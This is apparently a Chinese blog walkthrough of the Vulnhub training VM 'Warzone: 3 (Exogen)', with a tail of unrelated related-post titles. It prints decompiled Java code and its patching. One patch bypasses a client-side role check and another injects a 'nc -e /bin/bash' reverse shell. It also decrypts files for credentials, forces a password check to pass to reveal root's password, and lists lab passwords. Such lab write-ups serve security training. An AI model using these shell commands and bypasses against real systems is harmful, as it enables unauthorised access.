Warzone: 3 (Exogen) vulnhub walkthrough
2024-05-20 20:22:14
Warzone: 3 (Exogen)
vulnhub地址:http://www.vulnhub.com/entry/warzone-3-exogen,606/
0x01 信息收集到获取shell
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open tcpwrapped
ftp以anonymous登录,下载文件note.txt和alienclient.jar,其中note中含有登录用户名alienum和密码exogenesis。
接着反编译jar包,来到感兴趣的地方。
在Starter.java的actionPerformed方法中,判断用户权限时,由于存在本地鉴权问题(在idea调试过程中验证),所以在判断用户权限前添加一句role = "astronaut";来提升权限。
public void actionPerformed(ActionEvent e) {if (e.getSource() == this.loginButton) {String username = this.userTextField.getText();String password = this.passwordField.getText();try {this.socket = new Socket("warzone.local", 4444);this.os = new ObjectOutputStream(this.socket.getOutputStream());RE login = new RE();login.setToken(null);login.setOption("LOGIN");login.setCmd(null);login.setValue(String.valueOf(username) + "@" + password);this.os.writeObject(login);this.is = new ObjectInputStream(this.socket.getInputStream());RE response = (RE)this.is.readObject();token = response.getToken();role = token.getRole();this.os.close();this.socket.close();if (response.getValue().equals("TRUE")) {dashboard();} else {JOptionPane.showMessageDialog(this, "Invalid Username or Password");} } catch (IOException|ClassNotFoundException e1) {e1.printStackTrace();} } if (e.getSource() == this.resetButton) {this.userTextField.setText("");this.passwordField.setText("");} if (e.getSource() == this.showPassword)if (this.showPassword.isSelected()) {this.passwordField.setEchoChar('0');} else {this.passwordField.setEchoChar('*');} if (e.getSource() == this.viewButton)role = "astronaut"; /*代码修改处*/if (role.equals("researcher")) {JOptionPane.showMessageDialog(this, "Permission Denied");} else if (role.equals("astronaut")) {try {this.socket = new Socket("warzone.local", 4444);this.os = new ObjectOutputStream(this.socket.getOutputStream());RE list = new RE();token.setRole(role);list.setToken(token);list.setOption("VIEW");list.setCmd("LIST");list.setValue(null);this.os.writeObject(list);this.is = new ObjectInputStream(this.socket.getInputStream());RE response = (RE)this.is.readObject();this.os.close();this.socket.close();reportList(response.getValue());} catch (IOException e1) {e1.printStackTrace();} catch (ClassNotFoundException e1) {e1.printStackTrace();} } if (e.getSource() == this.uploadButton)JOptionPane.showMessageDialog(this, "Has not been implemented"); }
继续跟代码,点击查看文档发现是执行代码list.setCmd("tail -5 " + f);,于是将它更改为list.setCmd("nc -e /bin/bash 192.168.56.103 8080");,重新编译执行。
public void reportList(String value) {JFrame view = new JFrame("View Reports");GridLayout list = new GridLayout(2, 2);Container containerLIst = view.getContentPane();containerLIst.setLayout(list);containerLIst.setBackground(Color.GRAY);String[] files = value.split("@");byte b;int i;String[] arrayOfString1;for (i = (arrayOfString1 = files).length, b = 0; b < i; ) {final String f = arrayOfString1[b];if (f.contains(".txt")) {JButton name = new JButton(f);name.addActionListener(new ActionListener() {public void actionPerformed(ActionEvent e) {try {Starter.this.socket = new Socket("warzone.local", 4444);Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());RE list = new RE();list.setToken(Starter.token);list.setOption("VIEW");list.setValue("VALUE");list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /*代码修改处*/Starter.this.os.writeObject(list);Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());RE response = (RE)Starter.this.is.readObject();Starter.this.os.close();Starter.this.socket.close();Starter.this.reportValue(response.getValue());} catch (IOException e1) {e1.printStackTrace();} catch (ClassNotFoundException e1) {e1.printStackTrace();} }});containerLIst.add(name);} b++;} view.setVisible(true);view.setBounds(10, 10, 370, 600);view.setDefaultCloseOperation(3);view.setResizable(true);view.show();}
成功反弹shell。
kali@kali:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)
0x02 获取anunnaki用户权限
将/home/exomorph目录下的aliens.encrypted和wrz3encryptor.jar下载到本地(通过nc下载-过程略)。反编译wrz3encryptor.jar。
private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {try {Key secretKey = new SecretKeySpec(key.getBytes(), "AES");Cipher cipher = Cipher.getInstance("AES");cipher.init(cipherMode, secretKey);FileInputStream inputStream = new FileInputStream(inputFile);byte[] inputBytes = new byte[(int)inputFile.length()];inputStream.read(inputBytes);byte[] outputBytes = cipher.doFinal(inputBytes);FileOutputStream outputStream = new FileOutputStream(outputFile);outputStream.write(outputBytes);inputStream.close();outputStream.close();} catch (NoSuchPaddingException|java.security.NoSuchAlgorithmException|java.security.InvalidKeyException|javax.crypto.BadPaddingException|javax.crypto.IllegalBlockSizeException|java.io.IOException ex) {throw new CryptoException("Error encrypting/decrypting file", ex);} }
其实就是一个AES加密,看来整个warzone系列都喜欢弄点加密来迷惑人哈。以下是解密代码:
public static void decrypt(String key, File inputFile, File outputFile) {doDeCrypto(2, key, inputFile, outputFile);}private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {try {Key secretKey = new SecretKeySpec(key.getBytes(), "AES");Cipher cipher = Cipher.getInstance("AES");cipher.init(cipherMode, secretKey);FileInputStream inputStream = new FileInputStream(inputFile);byte[] inputBytes = new byte[(int)inputFile.length()];inputStream.read(inputBytes);byte[] outputBytes = cipher.doFinal(inputBytes);FileOutputStream outputStream = new FileOutputStream(outputFile);outputStream.write(outputBytes);inputStream.close();outputStream.close();} catch (Exception ex) {ex.printStackTrace();}}
代码其实就把ciphermode从1改为了2,得到用户名密码anunnaki:nak1nak1..。
kali@kali:~$ warzone3decrypt strings aliens.txt
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..
ssh登陆后进入用户目录。
anunnaki@warzone3:~$ ls
info.txt secpasskeeper.jar.gpg underboss.txt
anunnaki@warzone3:~$ cat info.txt
Remember to use --batch,
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
anunnaki@warzone3:~$ cat underboss.txt
。。。。。。
EXOGEN { WARZONE_UNDERBOSS_AL1EN }
0x03 获取root权限
按照提示解密secpasskeeper.jar.gpg
anunnaki@warzone3:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg #passphrase为nak1nak1..
anunnaki@warzone3:~$ ls
info.txt secpasskeeper.jar secpasskeeper.jar.gpg underboss.txt
通过nc将secpasskeeper.jar下载到本地逆向分析,将代码Main修改为
public class Main {public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {try {Scanner in = new Scanner(System.in);System.out.println("[Warzone 3] Root's Password Manager");System.out.print("Secret passphrase : ");String secret = in.nextLine();Cryptor cryptor = new Cryptor();Resources res = new Resources();String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));if (true/*user.equals(sys)*/) { /*代码修改处*/String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));System.out.println("[+] Success, the password is : " + plaintext);} else {System.out.println("[x] Failed");} } catch (NullPointerException n) {System.out.println("[!] Terminated");System.exit(0);} }public static String removeSalt(String salted) {String unsalted = salted.replace("al13n", "");return unsalted;}
}
随意输入,得到root用户密码ufo_phosXEN。
[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {16 required}
[+] Success, the password is : ufo_phosXENanunnaki@warzone3:~$ su - root
Password:
root@warzone3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@warzone3:~# ls
boss.txt cron Desktop Documents Downloads Music Pictures Public Templates Videos
root@warzone3:~# cat boss.txt
。。。。。。
EXOGEN { WARZONE_FINAL_BOSS }
by Alienum with <3
Warzone: 3 (Exogen) vulnhub walkthrough相关推荐
- Shuriken: 1 vulnhub walkthrough
Shuriken: 1 vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/ 0x01 信息收集到获取shell 服务器只开放了80端口,dir ...
- Money Heist: 1 vulnhub walkthrough
Money Heist: 1 虚拟机页面:http://www.vulnhub.com/entry/money-heist-1,592/ Description "The Professor ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- Vulnhub靶机:ME AND MY GIRLFRIEND_ 1
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 sql注入-失败 水平越权-成功 获取到所有账号密码 SSH爆破 SSH登录 Flag1 提权拿到Flag2 方法1:php命令执行 方法2:p ...
- vulnhub-durian
靶机:durian 下载地址:Durian: 1 ~ VulnHub 实验机:kali 2020 windows 10 1.信息收集 1.nmap信息收集 sudo nmap -sS -sV -s ...
- vulnhub Funbox: 1
渗透思路: nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件) 环境信息: 靶机:19 ...
- vulnhub Earth:解题思路
靶场下载地址: The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough ...
- VulnHub日记(八):Hacker Kid
靶机介绍 参考链接:Hacker Kid Walkthrough - Vulnhub - Security - NepCodeX 虚拟机链接:Hacker kid: 1.0.1 ~ VulnHub 开 ...
- vulnhub Tr0ll: 2
本文思路 nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0u ...
最新文章
- CAT 性能优化的实践和思考
- Python中单个下划线“_”变量的目的是什么?
- 终端执行php,PHP命令行执行PHP脚本的注意事项总结
- 客户端级别的渲染分析工具 dynaTrace
- 理解HBase zookeeper和-Root-/.MET表
- 详解 ASP.NET并行,异步,多线程
- java.text.ParseException: Unparseable date:
- synchronized的实现原理用法详解
- 无线投影之Miracast技术 收集
- CAD启动很慢怎么办?
- MySQL · Semi-join原理及源码分析
- 计算机文字录入标准,计算机文字录入员考试大纲标准.doc
- 【pandas drop()和dropna()函数使用详解】
- 自媒体全是带节奏的标题党,不是创作者不行,而是用户们想看
- Pandas 时间序列 - 实例方法与重采样
- 【人才盘点九宫格】你还不来学一学人才九宫格,知道领导在做人才梯度结构盘点时把你划分为属于哪一类人才吗?
- Raspberry Pi 树莓派连接温度传感器DS18B20
- 用户画像数据指标体系之风险控制维度
- 在mysql中怎么写触发器_mysql触发器怎么写
- 使用CXF框架开发WebService客户端